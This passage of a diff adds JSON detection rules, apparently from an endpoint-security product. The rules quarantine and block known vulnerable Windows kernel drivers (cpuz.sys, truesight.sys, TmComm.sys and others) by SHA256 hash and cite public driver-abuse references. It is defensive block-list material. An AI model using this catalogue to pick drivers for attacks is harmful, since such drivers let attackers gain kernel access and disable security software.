+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473659Z",
+ "creation_date": "2026-03-23T11:45:30.473663Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e618c3484111ea363a1ecd2c5f5d4abab13f2f474c870bfa5f6edb98df66f4cc",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5138adc-1798-5a29-a557-c6bd1e9be4fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619507Z",
+ "creation_date": "2026-03-23T11:45:29.619509Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5daf5fcf2e234f21d487a696f49410901b417162337052c657fb5fcaffcb771c",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f51b4e69-78d0-5ec3-8de6-43be2cdbf4d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827603Z",
+ "creation_date": "2026-03-23T11:45:31.827605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29a08f4404060bfe949ba170bd14ecfe63ea36d6c1b95626c4feebd031bbcd9f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f52c0a36-b73b-519c-99ad-a24aa9c8f1d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820777Z",
+ "creation_date": "2026-03-23T11:45:31.820780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e308f38ebb979e8a4608476c3d081e4410f657e7b031fe7103650a59f58e1208",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f53bb847-fb15-594f-969c-495cfb249ddd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817133Z",
+ "creation_date": "2026-03-23T11:45:31.817135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "801cb16225aaf3bebff46eaf5d9b0158ee0d1ccc4534dc6220b9cc18986a0c5b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f541314b-82e6-57c3-8e22-719892582cea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477318Z",
+ "creation_date": "2026-03-23T11:45:30.477322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7048d90ed4c83ad52eb9c677f615627b32815066e34230c3b407ebb01279bae6",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5423fa1-87e0-574f-ad5c-ef249230edab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832642Z",
+ "creation_date": "2026-03-23T11:45:30.832644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832649Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f5ff9939a42d48ce8c6eacd51fc62609b735e2b7a052df3e696051074348577",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f552cbf3-2637-54c5-9866-f240df35cda1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154149Z",
+ "creation_date": "2026-03-23T11:45:31.154152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f979e48c56cc6358b21b467012c19aa0e4c32134a5fe964158cb69caf4cd8d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f564c890-13d8-5d82-8fe1-0ee953d2687f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479439Z",
+ "creation_date": "2026-03-23T11:45:30.479441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0452a6e8f00bae0b79335c1799a26b2b77d603451f2e6cc3b137ad91996d4dec",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5674847-1ece-5c90-8da5-be6e995a22c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972703Z",
+ "creation_date": "2026-03-23T11:45:29.972705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f86fc8a6eaa3b38f33be4a0d552c184e575afa50a60df7383c06a394e3926d8",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f579ee1f-f584-5ac3-b4cf-e3ce74f94c12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974017Z",
+ "creation_date": "2026-03-23T11:45:29.974019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbc604b4e01362a3e51357af4a87686834fe913852a4e0a8c0d4c1a0f7d076ed",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f57af528-7d70-5074-9b6a-77947d9636ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142556Z",
+ "creation_date": "2026-03-23T11:45:32.142573Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3c9af8c4be8f62d25b955f92d2a4e9ebd34f7fa787580454ef54241102e7b30",
+ "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f580852a-12f0-5cc7-a76c-90b7f670e29a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490893Z",
+ "creation_date": "2026-03-23T11:45:31.490897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a1562b6f7385619258db40f1cf4593d1025cf97401462000840acd3c32ad16",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5876ff0-5366-544d-bc29-3cfb047613e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454821Z",
+ "creation_date": "2026-03-23T11:45:30.454824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5195443274ee3a382e947f03fd409437730434c2af0c1bb1c99f5ba1953f989e",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.Sys) [https://www.loldrivers.io/drivers/ebdde780-e142-44e7-a998-504c516f4695/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f590dc70-3db6-5651-b9ee-4bfa323dd917",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456161Z",
+ "creation_date": "2026-03-23T11:45:30.456164Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cac6f11d37bf2438a7f07053bbe692bb135bc06c245b56e8411e3bd906e15f98",
+ "comment": "Vulnerable Kernel Driver (aka fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys) [https://www.loldrivers.io/drivers/c7f76931-e24c-4d94-9e1f-5a083da581b4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5910f1a-42e1-5198-b510-8ae37cf1ba3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455759Z",
+ "creation_date": "2026-03-23T11:45:30.455762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b17d12076d047e74d15e6e51e10497ad49419bec7fbe93386c57d3efbaadc0b",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5916de2-3783-5006-9926-459c90f6bb4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472590Z",
+ "creation_date": "2026-03-23T11:45:30.472593Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0f6cd34717d0cea5ab394b39a9de3a479ca472a071540a595117219d9a61a44",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5918195-7664-5e6e-b0c9-2699a1ba478f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481295Z",
+ "creation_date": "2026-03-23T11:45:31.481298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec46f787b37654072b52fbc17d46607d1f14c8b4a25552a1bff8e10eb89c1a80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f595ae79-3203-57fb-bf81-27fc77f86e8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493901Z",
+ "creation_date": "2026-03-23T11:45:31.493905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b79dd4c9467d0d07b6a19a7768e5f9ded0778550b5f0f014a80ae44e67e0fdd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f597f5f1-8407-5a49-9aa1-f201e884d881",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822979Z",
+ "creation_date": "2026-03-23T11:45:31.822982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "950cbe3e38dfad78a935486807a8dbf85c77b8d0a792c994262591442c6ea6d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f59c15cf-1a92-5afc-b5f5-7045c01fefbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471860Z",
+ "creation_date": "2026-03-23T11:45:30.471863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471895Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7e0cca8ad9ea1e34fa1a5e0533a746b2fa0988ba56b01542bc43841e463b686",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5aa971a-891d-51e5-bbf0-c16ac657fe77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146894Z",
+ "creation_date": "2026-03-23T11:45:31.146896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146901Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f4198e14658e61eb7d1fbfa145b931e3fa03fc6b14163334eb4f7b778878e94",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5ac64eb-5984-5256-b980-4537596fce6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
